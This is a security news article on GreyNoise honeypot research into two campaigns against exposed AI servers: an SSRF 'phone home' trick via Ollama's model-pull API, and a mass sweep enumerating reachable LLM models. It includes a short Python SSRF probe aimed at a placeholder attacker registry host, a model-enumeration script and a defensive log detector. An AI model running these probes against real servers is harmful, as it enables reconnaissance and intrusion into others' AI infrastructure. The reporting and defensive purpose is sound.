Hackers Launch Over 91,000 Attacks on AI Systems Using Fake Ollama Servers

Researchers have discovered that cybercriminals are turning their focus toward the systems that power modern artificial intelligence (AI). Between October 2025 and January 2026, a specialized honeypot (a trap set by security experts to catch hackers) recorded 91,403 attack sessions.

The investigation was conducted by the research firm GreyNoise, which set up fake installations of the popular AI tool Ollama to act as bait. The research reveals that more than one group is at work: two separate campaigns are active, each trying to exploit the growing world of AI in a different way.

The Phone Home Trick

The first group of attackers used a method known as Server-Side Request Forgery (SSRF). To put it simply, this is a trick where a hacker fools a company’s server into making a connection to the hacker’s own computer. Researchers noted that the attackers specifically targeted Ollama and Twilio (a popular messaging service).

By sending a “malicious registry URL,” they could force the AI server to “phone home” to their own systems. It is worth noting that this activity saw a “dramatic spike over Christmas,” with 1,688 sessions occurring in just 48 hours, according to GreyNoise’s blog post. While some of these might be security researchers or bug bounty hunters looking for rewards, the timing suggests they were pushing boundaries while IT teams were on holiday.
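To make the “phone home” mechanic concrete, here is a minimal sketch of what such a probe against Ollama’s model-pull API might look like. The /api/pull path is Ollama’s standard pull endpoint; every hostname below is a hypothetical placeholder, not an address from the campaign.

```python
import requests

# Minimal sketch of the "phone home" probe against an exposed Ollama
# instance (port 11434 is Ollama's default). All hosts are placeholders.
TARGET = "http://victim-ollama.example:11434"

payload = {
    # The model reference embeds a registry host. Resolving it forces the
    # victim server itself to open an outbound connection to that host.
    "model": "attacker-registry.example/library/fake-model:latest"
}

resp = requests.post(f"{TARGET}/api/pull", json=payload, timeout=10)
print(resp.status_code, resp.text[:200])
```

Because the outbound connection originates from the victim server, a single request like this is enough to confirm to the attacker that a live, reachable Ollama instance exists behind that address.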

Campaign 1 timeline (Source: GreyNoise)

Building a Hit List for AI Models

The second campaign is even more concerning. Starting on December 28, 2025, two IP addresses (45.88.186.70 and 204.76.203.125) began a massive, methodical sweep of more than 73 different AI endpoints. In just eleven days, the pair generated 80,469 sessions to see which AI models they could reach.

According to the researchers, these were professional actors, likely conducting reconnaissance, since they were not yet trying to break anything. GreyNoise noted that the actors were “building target lists” by testing models from big names like Anthropic (Claude), Meta (Llama), xAI (Grok), and DeepSeek.

“The attack tested both OpenAI-compatible API formats and Google Gemini formats. Every major model family appeared in the probe list: OpenAI (GPT-4o and variants), Anthropic (Claude Sonnet, Opus, Haiku), Meta (Llama 3.x), DeepSeek (DeepSeek-R1), Google (Gemini), Mistral, Alibaba (Qwen), and xAI (Grok).”

GreyNoise

The analysis also revealed that the attackers used simple, innocent questions like “How many states are there in the United States?” just to see which models would respond.

Campaign 2 test queries (Source: GreyNoise)
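To illustrate what this enumeration traffic looks like, here is a minimal sketch, assuming the target exposes an OpenAI-compatible /v1/chat/completions endpoint (one of the formats GreyNoise observed being tested, and a path Ollama itself serves). The host and the exact model identifiers are illustrative placeholders; real probes cycle through many variant names per family.

```python
import requests

# Placeholder for one discovered endpoint; the real campaign swept many hosts.
TARGET = "http://scanned-host.example:11434/v1/chat/completions"

# Model families named in GreyNoise's report; identifiers are illustrative.
CANDIDATE_MODELS = [
    "gpt-4o", "claude-3-5-sonnet", "llama3.1", "deepseek-r1",
    "gemini-1.5-pro", "mistral", "qwen2.5", "grok-2",
]

# A harmless test question, as observed in the campaign, used purely
# to check which models answer.
PROBE = {"role": "user", "content": "How many states are there in the United States?"}

for model in CANDIDATE_MODELS:
    try:
        resp = requests.post(
            TARGET,
            json={"model": model, "messages": [PROBE]},
            timeout=5,
        )
        # A 200 with a completion means the model is reachable -- one more
        # entry for the attacker's target list.
        print(model, "->", resp.status_code)
    except requests.RequestException as exc:
        print(model, "-> unreachable:", exc)
```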

How to Protect Your Systems

To keep these systems secure, researchers at GreyNoise suggest that companies should only allow AI models to be downloaded from trusted sources. It is also important to watch out for rapid-fire requests that ask the same simple questions over and over. The scale of these attacks is massive, involving 62 source IPs across 27 countries, which is a clear sign that hackers are now mapping out their next big move.
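Defenders can act on the second recommendation by flagging repeated identical prompts from a single source. The sketch below is a minimal example, assuming JSON-lines access logs with source_ip and prompt fields; the file name and field names are hypothetical and should be adapted to whatever your AI gateway actually records.

```python
import json
from collections import Counter

# Hypothetical JSON-lines access log; adapt the path and field names
# (source_ip, prompt) to your own gateway's log schema.
LOG_PATH = "gateway_access.jsonl"
THRESHOLD = 50  # identical prompts from one IP before flagging

counts = Counter()
with open(LOG_PATH) as fh:
    for line in fh:
        event = json.loads(line)
        # Key on (source IP, exact prompt text): enumeration campaigns
        # replay the same throwaway question across many model names.
        counts[(event["source_ip"], event["prompt"])] += 1

for (ip, prompt), n in counts.items():
    if n >= THRESHOLD:
        print(f"possible enumeration: {ip} sent identical prompt {n} times: {prompt[:60]!r}")
```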

Expert Warnings on AI Risks

Security teams are viewing these findings as an early warning of a much broader risk. Chris Hughes, VP of Security Strategy at Zenity, shared his perspective exclusively with Hackread.com, noting that while probing models is a concern, the immediate danger lies in how AI agents interact with company systems.

“While this marks the first public confirmation of attackers targeting AI systems, it certainly won’t be the last,” Hughes stated. He explained that the information gained from these probes will likely be used for future attacks. He warned that the greater risk appears when AI tools access enterprise systems or cloud environments without proper oversight.

“As attackers move from probing models to exploiting agents, organizations that focus only on model-centric security will be responding to incidents they never saw coming,” he added.





